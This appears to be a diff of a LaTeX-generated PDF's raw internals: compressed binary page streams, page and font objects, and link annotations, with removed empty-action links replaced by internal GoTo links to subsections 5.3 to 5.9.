-°€¼iˆNcÆK0çN§eÇ»¦ˆƒžù@Z£‘´’“§cÌL7åkþþš[®ëlfÀ×ÂÑ ¶kQíŽUíVšdðcMâRﻇ—:2\º´Øƒ9Ë 'ÌB¶‡¸m˜‡ev)‚­µ°Ü3çÈ:b¹"WDã!¶ –¡]XVšÑîè¶ëÉNRà\öדۥ ÛR0TC?7¯âb¸ƒÐs…Ï•ˆƒÄ¨½¡¤´·t9ï?¨Nkg°Œ¡†¾f^N ¥@ˆâ‘ô¼|ÿñ7ìòüÕŸªƒ;­Sª’¾aé9qIÐDä6B8W„ ÒêbVöù°§ŸcD—/U3© "¸b† hx[dÀÓš›Žª—¿¾á‚5,Šù°~݃…øTObBhlýŽÞáù¿¡™@0‡¢èxņ&Jû®© D̹ç¹qôý>5†ê/>Ðô׺â»<>]§mj}¨woWÝÛ€Èñ¾Rä¨á©m¢0;n¶tPaZªÛ47›kòaÊ’ùšæ¥:Ê阉‚š™ˆ -ët^õ›ÎzbX-ꞢCZÏŠ‹‘AeCÝìtYfdC¹í# ØIéåÇ‹—lÊÑÔãÄ•áHͽùçuQëÛ´Ä´f –܇g™ c°cJ®¼ØCе)2C«ÃXFQ_{Í9_gSlφ¶™f™6† 1n,‰]nQç¤Yηz ¸Ùr*rÇ4þ8Ö?Zzö5±"›íMG$^ÙÔ pÄ€z€ù!Éaþÿ^]) ÅkI\%åÔ«'S®íÇ•ÂãÞ:  Å7è¾g;}tÔÍýjŒ€£6ÚÂxlaZP}Ýa?f‹\›¥¹­ŠÒÙ:™©/ÅöƒËd¨'1Í”jtôÑ3Ž_îŸüØË>ï·=ñ¾ã¤Px;ã°Þ4K+›ù€§´æ³·)6lM ?éaÈùidADŠìŽÞvä¥Ñ;Ò‹î­å~¹â)ÀaA¼Æ> [²Q¼æD^w<¹d1æ.ç(#KrÅÅÑiUVq<¥mÄI°‘.ÇÂÏ ([[Z6ñ"@X.6ÔúŽ -s-Æy‡.‡øóÈÑúž‚àptš/¾í×M®s®šÞÀóœ ß4u×ÚgIo›[kûܤÅSÎ4¹±ój;6eh¬ÇnƒìŠª747×È¥´Zä²#^bkÄò—g€‰ ž’ì‘ؤG°lQìGvüÝ“/Ñ„ÂÌt2B¹â0§çFKRˆÜ$­±àˆÂŸNË#Ò?M˜T*päÒ¾üäHÊ›Db'¼~4õß N6²dŸó$>¶ÌivL½ðŽr±GV ½Ð•É:ŸCèE½³˜ú0ƒ h´£—Mm© ”Îß]PAüu1šâž„ã즴 A'x4ƒ‹ó¹fSg€0Ð…‹b[tÃ÷ÏË™÷CnðÒ~Kmûj)\°äMa(c@dtŒ -ۮߦåÎ&?’9ôñ3²|ôsƒúNÁIºKºñaŽ9”*ÍÙN‹Ž9}‚¥ëÓ‡0fg#ïkÀ«‡Y1ÜÉÇkŠ®º~`Lñ9Σ/Ô µ}Çe)åì<åËRµ¥Rº"œ~¼É4M"£dn„¶…s"X´$£ø=6‚- w“oìö±ÍºýŠÊÇ_ì˜À#àTÖ±…¨p1L}êû¾S~Z ˆGÏ/?0y§Ï¿®î÷`Bto/úvØñ$©ò¨©!Åbìè‡é•ãÝéOA/>ÂNì”Út´l2Yú„3Zr1Ç`ÄÿîÑcz¾¸:ûªƒn -endstream -endobj -542 0 obj << -/Type /Page -/Contents 543 0 R -/Resources 541 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 422 0 R -/Annots [ 515 0 R 516 0 R 523 0 R 524 0 R 525 0 R 526 0 R 527 0 R 528 0 R 529 0 R 530 0 R 531 0 R 532 0 R 533 0 R 545 0 R 534 0 R 535 0 R 536 0 R 537 0 R 546 0 R 538 0 R ] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 561.728 327.895 570.582] +/A << /S /GoTo /D (subsubsection.5.3.10) >> >> endobj 515 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [315.25 722.345 356.53 733.135] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 542.952 430.789 551.806] +/A << /S /GoTo /D (subsubsection.5.3.11) >> >> endobj 516 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [430.097 722.345 450.377 733.135] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 522.239 429.931 533.03] +/A << /S /GoTo /D (subsubsection.5.3.12) >> +>> endobj +517 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 503.463 456.243 514.253] +/A << /S /GoTo /D (subsubsection.5.3.13) >> +>> endobj +518 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 484.687 168.393 495.477] +/A << /S /GoTo /D (subsection.5.4) >> +>> endobj +519 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 465.91 231.668 476.701] +/A << /S /GoTo /D (subsubsection.5.4.1) >> +>> endobj +520 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 447.134 221.874 457.925] +/A << /S /GoTo /D (subsubsection.5.4.2) >> +>> endobj +521 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 428.358 222.538 439.149] +/A << /S /GoTo /D (subsubsection.5.4.3) >> +>> endobj +522 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 411.518 251.865 420.372] +/A << /S /GoTo /D (subsubsection.5.4.4) >> >> endobj 523 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [153.344 638.104 258.919 648.909] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 390.252 275.576 402.205] +/A << /S /GoTo /D (subsubsection.5.4.5) >> >> endobj 524 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [271.632 575.618 315.181 586.423] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 371.476 317.561 383.429] +/A << /S /GoTo /D (subsubsection.5.4.6) >> >> endobj 525 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [195.872 554.02 227.745 564.824] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 353.253 149.026 364.044] +/A << /S /GoTo /D (subsection.5.5) >> >> endobj 526 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [288.087 554.02 324.387 564.824] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 333.924 238.336 345.876] +/A << /S /GoTo /D (subsubsection.5.5.1) >> >> endobj 527 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [387.368 462.031 540.996 472.836] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 315.701 342.807 326.491] +/A << /S /GoTo /D (subsubsection.5.5.2) >> >> endobj 528 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [428.893 413.175 479.635 423.979] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 296.924 420.414 307.715] +/A << /S /GoTo /D (subsubsection.5.5.3) >> >> endobj 529 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [438.887 356.348 534.887 367.152] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 278.148 254.272 288.939] +/A << /S /GoTo /D (subsubsection.5.5.4) >> >> endobj 530 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [236.095 266.051 293.592 278.004] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 259.372 239.857 270.163] +/A << /S /GoTo /D (subsubsection.5.5.5) >> >> endobj 531 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [295.435 266.051 328.775 278.004] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 242.533 152.761 251.387] +/A << /S /GoTo /D (subsection.5.6) >> >> endobj 532 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [397.913 266.051 423.256 278.004] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 223.756 165.543 232.61] +/A << /S /GoTo /D (subsubsection.5.6.1) >> >> endobj 533 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [451.259 231.377 540.996 242.181] -/Subtype/Link/A<> ->> endobj -545 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 217.748 117.823 228.538] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 204.98 162.002 213.834] +/A << /S /GoTo /D (subsubsection.5.6.2) >> >> endobj 534 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [141.588 217.748 259.615 228.538] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 184.267 252.64 195.058] +/A << /S /GoTo /D (subsubsection.5.6.3) >> >> endobj 535 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [186.613 160.921 223.881 171.725] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 165.491 158.765 176.282] +/A << /S /GoTo /D (subsection.5.7) >> >> endobj 536 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 147.292 217.481 158.083] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 146.715 459.923 157.506] +/A << /S /GoTo /D (subsubsection.5.7.1) >> >> endobj 537 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [502.621 104.094 540.996 114.898] -/Subtype/Link/A<> ->> endobj -546 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 90.465 188.817 101.256] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 129.875 173.013 138.729] +/A << /S /GoTo /D (subsubsection.5.7.2) >> >> endobj 538 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [307.122 90.465 382.626 101.256] -/Subtype/Link/A<> ->> endobj -544 0 obj << -/D [542 0 R /XYZ 72 793.935 null] ->> endobj -22 0 obj << -/D [542 0 R /XYZ 72 760.449 null] ->> endobj -26 0 obj << -/D [542 0 R /XYZ 72 709.404 null] ->> endobj -30 0 obj << -/D [542 0 R /XYZ 72 681.536 null] ->> endobj -34 0 obj << -/D [542 0 R /XYZ 72 541.078 null] ->> endobj -541 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F24 512 0 R /F14 522 0 R /F27 521 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -562 0 obj << -/Length 3093 -/Filter /FlateDecode ->> -stream -xÚ½ËrÜ6ò®¯˜Ê‰Såa|¥jrl'›ØÎCJåä€!1#n8ä„ËÎ×o?IQJvç¢@£Ñïn*Ø7Áæ‹«ß®ü±Iä&É_dÙ&?]ýôK°)þÕ&ðU–nîi×i£â~«ÍÍÕwWÏo¯>}%Å&ó³XÆ›Ûãý,Œ6·Åæ'OøÛ]š)ïßõ6”^ß6ÛüCÞ—M½ýåö«O_‰hr^Å¡H¸€N'¸ã*°”º_8¢&GvJ¥~Ä0}¥2>ús 槄â(t÷¼ÑH݇-`½t…¬PúRŒd=ƒG¤©×ýVôÆIì½ÛÊÄ3m7¾jΕÈWãéÀ}µr‡L| ¬·»ît‡˜o¿ÝÉÔ3f+¼š!ÍÏA祮ª Ðynν)˜”Òn{aö¥¶ãÖœ MÓ•}Ó~ئÊÁDI»z]Vö.&þŠÕ¡=Z½øþ‹«ÍO´Þß•Žªª9âÞÍN„ -Ä-pàÇ2eêÝmýLˆì/ä2—& f'…eÿ,¯ÏmY‘ByR®ið?&¢”i4ŠR&!Š2}B”Òer‘eÂWµ¦2 1ážçº.ÊB÷v*VBùÊ!:6,æŽi8ûªÌ‰8åÝ—ýƒAä<èô½Î‘à_GâAŽäl‘ 5ùYe…jÂ'Y~ôNn³ü,ÇŸW¬™ô¾„Í0ÞË¡mX¶†Wdd¼ôySLkêÜøhGw D ¢¥³›Ë:¯†Âð~óÞäyZkü«Û}Ù·t”våÍé¬ì즚¡½EM“¡.L[}(kVÈ`þGn«{ܱ ³Àë>t½9wU ¼Ã€LE0ììÍ÷âUdæãè >¥G³Þ¹‚qSö¼Ò7ükº^ƒÜ:{@[ÍÐïšÃnï`Àíçßò oêÚ+´Ä€e«–­fùV 2ù ö4’únEX/\jlÞŸ+& &‡¦åÁ›2o›®9Xø 0¾…M€°%Þs཮|ÊÀÆ77A¶ õÀ¬‘¤£.ë®_¿ò»×îîvTÑ–/ -ÖÌìJCÜáH]@ ª7G°lêõ¯¤óÍEý[»‚æƒ[ÁBõ^w†ÁÝ‚8Dî.á÷wMeÐýg±W7½%¦&©àÍwâeСmN—KWžéHøG¼¢ŠÁÅk^Qúbæ•”Þsˈ<º-šÇUCà²ZÓò4}·TTm -8À}€WbÜSþ(xô¯«Ê¬`ÚÇ ƒWÜß•½9kçÖhƒ›Ó Ñ -x8ñ8%ˆƒ™Dû@aèÅßëS·cïjù:“xoÚB“û)xIÂ"½·uý -û;:Vãáœ?5ÅIK˜4au G½Ã¦‡¢D_Ì`f½pQ†ÿ #›Â#xÖŠÛ£.©yÚ5'ó”2H -DUâƒÖô>oØ…±s>š‡™[2<³ù¸¶ñF·9æ †‘^´fYÉÄ<"TÓþ‘]$ÁÓvëä¥qÀ²ƒ  -OL\§ÆÊÙ —¾à¸5¹½Žç£û¡ÅÄg,m ¬Â_KÎ,A;¬Êò[gÂ2õm:‘è¥ð«8ÐÁÜP` Æ4]ñ2êûU^Â^C{¯¶à,Û†÷2âïu}4Œìÿ¸Bx×7ßòò%õà9äRà¬})_0-VýУÃÍ?Ü\ûŒává«]Zke „¹òYʉQ[˳+Γ©¶…>äÌN{8F)°ë?faª¨>Cçxo)¨D”ŠƒH(°Àìúí >#þµšJFʱp7œ²‚ã­ È#yÏÜ¥=c ”û¡1-RŒ›—¯_~~»ÎÓl¼%çÔ´\ºJïºê¼2ˆ¼ÓH,(ü$˜âìN_bC&‰N±,«òwS6Ì4d–õZ露ŒJ;ÉŒÔ"ì] -Øžˆ†ÔÖÍ ;C@ËN†¢8>qÆ'\ÛÆ·->ríñ•¦æŸ*ó²5‘d «ó`ü‰ ™:‰ÊÝ’¨©v¤ÉÔ9XE[ᬮ)¥¦¼]+ -eèG*Zâ¾3`Wﶯ ‰OÙÎ-wédàzõvv*kjSÀ„â^òÞX,ÜWÁØåÜÉX‘†s#º¼™Û_çÛL.Ir§Ðf½¸¥·¬ŠáxíãÝØÿÆôºãžø²÷«Ÿa‡MPÿ‚° ï![ãVO¶O6T“Ëq_¥‡zl\†ù†c/ Xr?}éJ&D‘sÇCŸ =ºiÅ4T)×…x$ó»¸ö“.F7º™ÂF4úJq>ý ¶žù§À•t“Q8e ±¦‰Mþëªn°°ôQÁú7´Xú¡˜f2I½Úè'2ŽÀ=| é–gúÐsÞb1 |W6CÇ3ëd,ÊGS)2?žÙâZ‚˜ø2ß—7'c/!mªò`‰˜&.H'¯Ã¨ÕzgYYæËPÍ[S¹UVt‹æ5Ÿzn¨1çÙÖø܈í—8{pZŽÙ~ÃÃ: ¿Fò"±Gë,(@Ç/Ú³‚®³TÙXI= -¤£xl\Ì£+¿>‘XµoER±žÎá…-+ëÀ9•‡…¥`ÀePD1‹‘qO—ô(í:‘‹S¸¾à/s‘«ÓLø´œå>¿o¦Âl.‘SøŽòõßy^Þ^ý~»+ -endstream -endobj -561 0 obj << -/Type /Page -/Contents 562 0 R -/Resources 560 0 R -/MediaBox [0 0 595.276 841.89] -/Parent 566 0 R -/Annots [ 539 0 R 564 0 R 540 0 R 547 0 R 548 0 R 549 0 R 550 0 R 565 0 R 551 0 R 552 0 R 553 0 R 554 0 R 555 0 R 556 0 R 557 0 R 558 0 R ] +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 111.099 173.013 119.953] +/A << /S /GoTo /D (subsubsection.5.7.3) >> >> endobj 539 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [500.887 747.553 540.996 758.358] -/Subtype/Link/A<> ->> endobj -564 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 733.925 116.495 743.98] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 90.386 160.286 101.177] +/A << /S /GoTo /D (subsection.5.8) >> >> endobj 540 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [342.199 671.439 387.076 682.23] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 71.61 403.066 82.401] +/A << /S /GoTo /D (subsubsection.5.8.1) >> +>> endobj +545 0 obj << +/D [543 0 R /XYZ 71 806.89 null] +>> endobj +542 0 obj << +/Font << /F21 503 0 R /F15 499 0 R /F22 546 0 R >> +/ProcSet [ /PDF /Text ] +>> endobj +586 0 obj << +/Length 1455 +/Filter /FlateDecode +>> +stream +xÚíZIsÛ6½ëWðÔP3%C,\Ð[/ÓLOlyrpr€)HbÃÅI»þ÷ Pʶh¥µ–‹J M½÷á}cj8ÆÙàï£cdžOb„Éàú»cŒÅç ÇÆ$0îëU‰½@Œ±q9ø28 ÞŸB`›xÐ3Fù d䣱qm~8ÿ<:ù<º~}| +Ü…¥ØC¶ųꅨZ1pÔKÉâSõfgÃÂ8°@ŒÈƘȻ\› -à@hž¤C˜eÂ8-¢,m=͸¶ˆã›öÐrç…&d½^9¼Ùÿ·$€˜ÐŽ-mâÃíûÞœ,ºÆæMSÆ5–÷ÀÄzC?z¨˜¹dy^m !d–¹NvÝîùÏhAŠ–%ç¬Ö¸¢¢›cZК3ä”î9&‚L`ÅÄ1+XXÈýq?cÅLl‘ú"ã’™4Sߊ¯ä$×öT½0Êå'TsFå‡ã$J£¼þ,Óö ça¯5òr@ŸÄ[wý¢„¦tÊ’–çyÁ’G`òå×q Ü>ëܘÍy¤4ËIÈi8„¾ùãeP #|3—ᮧ·4Ïï«¥K^f4Ÿ±\÷ÏèõPm #ö&àÑ]³©þ“ƒËéO×µNàHà‚ÍdzXÇÌ}ãaÜÆ€$½|—·×ë[Í'[äOIwœ¡å ð37…Û¸R*:frrÓLòjÂÄD"ˆM_‡ ìr°1 à$È §Â_¹¤,.“TãûîŽDü]¡rúÀ%ìÇer« ^U‰:|“Œv5€ï2ò~h£e´i·`oD¥­)Ïáý˱:}ÇñKFyXá7“`N* 3Þ’‹_t$_̤žðŽÙBä;ÕCèã<] ðE©²Ê°Ì‹,‘æ{ùå“ +ù ¡æóðcY–=¼…‚~&mu×/«Å…Ð<âeã%'µLà{‡"åÆYƒýŠÎÀ±U£Ñ&…§Žjnb±™Òÿ”&]jïïýxp:(€OQÐŽ«ÁÚƒ-ÑîUb¤X]‰lݳoÂ)SÅ£I™†Å¼"¥±°³kü½«êwzéõ¤Ç¤ ‘ž?jˆ—]uUJiBÏ%Žðœ#}s\çêøT @¯‘º[ëŠQ_ë†ÒºO£&QZ¬PÑ0dyGMZˆ?‡¥U$5öÁèx¡ÙÍÊÔæ&¼ÙóŽI»Ž&쮪u3þn¾oWÄk›mƒº£õ)lœéÕmœµ`]ÄEd±ÙÆA ܆H÷$Eåüvh‰”©>K’Nuy)蹬J¬î†õR-\$þ¡?¾Ò¡º=*š J“øR~œòiô™¢®ò¨­f$&’Ëv3#Ì’¤jªiÙ±¿í¢í®/-¨‘–ó²°²‰u3o7V¥„&T™”±Ä1ÌÒ´Ž+l«o?KÜý'+¿åÕ_y÷/ÐG,wTsÈ[Ém¼¾Ê¥r|Òq­ +÷*›álZY^^ƒ'tUxâàž-ëòðöÖˆ×?2+`VNû4.ó™vVx^%[F)†ÿÃú¾òè'y%´h&âBYr6‘ÔPÎ#˜êù,Þ?Ñé–‘o'£Á¿ï— < +endstream +endobj +585 0 obj << +/Type /Page +/Contents 586 0 R +/Resources 584 0 R +/MediaBox [0 0 595.276 841.89] +/Parent 504 0 R +/Annots [ 541 0 R 547 0 R 548 0 R 549 0 R 550 0 R 551 0 R 552 0 R 553 0 R 554 0 R 555 0 R 556 0 R 557 0 R 558 0 R 559 0 R 560 0 R 561 0 R 562 0 R 563 0 R 564 0 R 565 0 R 566 0 R 567 0 R 568 0 R 569 0 R 570 0 R 571 0 R 572 0 R 573 0 R 574 0 R 575 0 R 576 0 R 577 0 R 578 0 R 579 0 R 580 0 R 581 0 R 582 0 R ] +>> endobj +541 0 obj << +/Type /Annot +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [85.944 749.49 167.176 758.344] +/A << /S /GoTo /D (subsection.5.9) >> >> endobj 547 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [189.398 622.029 226.666 633.982] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 730.714 174.148 739.568] +/A << /S /GoTo /D (subsubsection.5.9.1) >> >> endobj 548 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [288.096 622.029 313.44 633.982] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 711.938 194.926 720.792] +/A << /S /GoTo /D (subsubsection.5.9.2) >> >> endobj 549 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [322.438 622.029 372.876 633.982] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 693.162 218.36 702.016] +/A << /S /GoTo /D (subsubsection.5.9.3) >> >> endobj 550 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [512.997 608.953 540.996 619.744] -/Subtype/Link/A<> ->> endobj -565 0 obj << -/Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [95.91 595.324 134.728 605.38] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 674.385 433.058 683.239] +/A << /S /GoTo /D (subsubsection.5.9.4) >> >> endobj 551 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [192.103 573.725 229.372 584.53] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 653.672 317.519 664.463] +/A << /S /GoTo /D (subsubsection.5.9.5) >> >> endobj 552 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [274.422 560.097 445.227 570.887] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 634.896 437.595 645.687] +/A << /S /GoTo /D (subsubsection.5.9.6) >> >> endobj 553 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [276.448 524.869 310.894 535.673] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 616.12 361.593 626.911] +/A << /S /GoTo /D (subsubsection.5.9.7) >> >> endobj 554 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [324.043 524.869 427.351 535.673] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 597.344 340.843 608.135] +/A << /S /GoTo /D (subsubsection.5.9.8) >> >> endobj 555 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [194.539 427.155 231.807 437.96] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 578.568 344.661 589.358] +/A << /S /GoTo /D (subsubsection.5.9.9) >> >> endobj 556 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [252.653 272.681 300.905 283.472] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 561.728 267.276 570.582] +/A << /S /GoTo /D (subsubsection.5.9.10) >> >> endobj 557 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [221.492 259.053 375.295 269.843] -/Subtype/Link/A<> +/Subtype /Link +/Border[0 0 0]/H/I/C[1 0 0] +/Rect [108.853 542.952 295.441 551.806] +/A << /S /GoTo /D (subsubsection.5.9.11) >> >> endobj 558 0 obj << /Type /Annot -/Border[0 0 0]/H/I/C[0 1 1] -/Rect [186.778 174.968 241.449 185.772] -/Subtype/Link/A<> ->> endobj -563 0 obj << -/D [561 0 R /XYZ 72 793.935 null] ->> endobj -38 0 obj << -/D [561 0 R /XYZ 72 414.214 null] ->> endobj -560 0 obj << -/Font << /F21 420 0 R /F15 416 0 R /F14 522 0 R /F27 521 0 R >> -/ProcSet [ /PDF /Text ] ->> endobj -577 0 obj << -/Length 2769 -/Filter /FlateDecode ->> -stream -xÚµY[“Ó¸~Ÿ_‘G§Š[–oûËÂâºjëìƒÆQ;È6ÃüûíVK¾ ÔayIdYjI­¯»¿n«Ã*X=»ú|° -W)[¥yà‡y¾*NWþV;è± -|žg«[3ê´âIÿåj{õîêñõÕç,\å~ž°du½'‘ŸGñêz·úà1½Érî=]ç‰'EÛiÙ¬ÿ¾~ñði¦ñ$òrͤ G\vƒ³6vì†G>ç9ÍýØçëMòÜcA΄|$ ä~Îùjøð„æ ÂôҢ؊Üö^×ëˆy_ðGžð÷f½Á¶^o8<¾p¾$ô£(sÀø<ö´,¥h$ Ÿ,å~”r7<ðã‘afŽoÇœ„þÔ€Ø,òÚ£¤†¬vØ`^½Ÿ½y³f™÷×: CïÑö-õmÏZUjÓæý^¯70rg§ÍšVQW(¢•MKg¡[U¨uèá<ØSW>îדûaB#òf¯î±Ô•Ð»åpï({ˆH}°ÐüóÙÕê ˆ=Q(òt.Us”»É¥¹!eIÂìy¹wÖõ¹‘F±WÃuű÷?Y´ ½¾=ªbÍRïHª*Êng§Š²©]·j•(IHÓá 0§Ö-õìkMãÞhQ”ÒÜq -w°1g¦‡>ŠªÀýp:Q‰â,ðö¨9‡ï_?óšF~£æöÝKj¨ -¢à>Ì£¨v4m.ÿæÒFƒCO~=—µj'¢ƒAtã–Z:Ê®¯AQäÐRR’:Œ|l¼o¤Þ<:È -µÜRßQŠÔÉT7dwöçÿ‡©¾è*Ü Xe¸dCQæ§Q:6Ë ’ FÚàSF„]£¾ï›m6É¢Ál—×MK½s Æ>gÁãÙæNRcÁøHŒNªÔ•t¶™r?w8¹Û룂 ÆAÐûª Ïsoo9(,æ£S]pc8°†ýj÷FÀòðÎIo'I^ÃÊ4€qæ„Øñäñ«-µð¬ÕAj<‘™BÝL¿Bã8¬ŽÒ,ÃFX‡nï[+¹^Bl!Ê¢+E‹§ bZ u‚îíW'û•‰ÿBkõe£‡y€&Žòìì'ÔVŽÙrw’Ú®‘x 9 Y( rŽ†¢'Hò ŸÑìmí¦(¤Cƒè ¶¦ô)qï°“4‚nßU¢ØË9N´<—bXzêu(ÿAŸ\ö°ÚK-+çæEy¨5ëDtBã÷ÜÌÕŒqØOøµ®|‹QoŠ’Gùq<÷åOD¥–úHZ!Sof:‡¸—=ú4@<ûr+<òéÿ™¿äÎ[ñi¼´ó õ°)}Y ‘ý ë]³Da¢Ä²ä’îÄn7u3”ËÛ 8š{^ì¡ æ¾ÅÖM{ÐÒ¸\ã)Ä:ŧË6ÊòÀφºIà‡KFÊý$êÏrY¡Q ªd?—Q–wTañ²bÓt¤Ø‹¸)œÈʲ+ -uH tvP úô†ŽÌ&x¦g´[Cìž®±°£v¹þ>v–‚—õy‚Óa>.wáÌ.@…ŽÕÀćMÖ† u7Öú»7gFˆjT[ë»ûšàp½àç˜: …ÊÐ:9Êät.{×(w3×Yª“ê{›þMD¿º³@6†!w.¶ˆ¾ˆ‹Wø642 «¸>]çìBùò9–ù iË þöAT5ÁPº -½ßì9¤H~ÇÌ®Á³¾8âþXì=“•Ô -òÒ(ûôþ_à“SNìȲÃJòyµ -zPõ ´b6ïýÝÊrY''F8—ㇼgžT°[’Ã|²Ër ;wÞbÀÜÞŸá~8”›ˆ ./ð9ë×|5Ø8ˆ‰ÀšØoÆ0ÄL»_çFˆ›OSFÝöµk°¡Ÿ‚R' ™¤8Œhç®x¼r“¦è¯µ3T‹aJÐ܃3À—0 ÿ‚DÞ˜ª'ÞS¯±ÀÃÓ ‡8Î)0áÆñ¦2»PÞ]Ñjo)÷H‹h$ð-dÖMãßcf[Ï+ÀÝI}µÛ;Úÿ$€=·f¨ñÝ¿Áƒ~ÄH"ÆfF‚=T(&1¼-%½Ò xgðØJƒˆc¥ /i~[B!(4ÈzYÚˆˆ³ ½›R•ÀýsLÇÕèXÆÌgAxÉœ€• 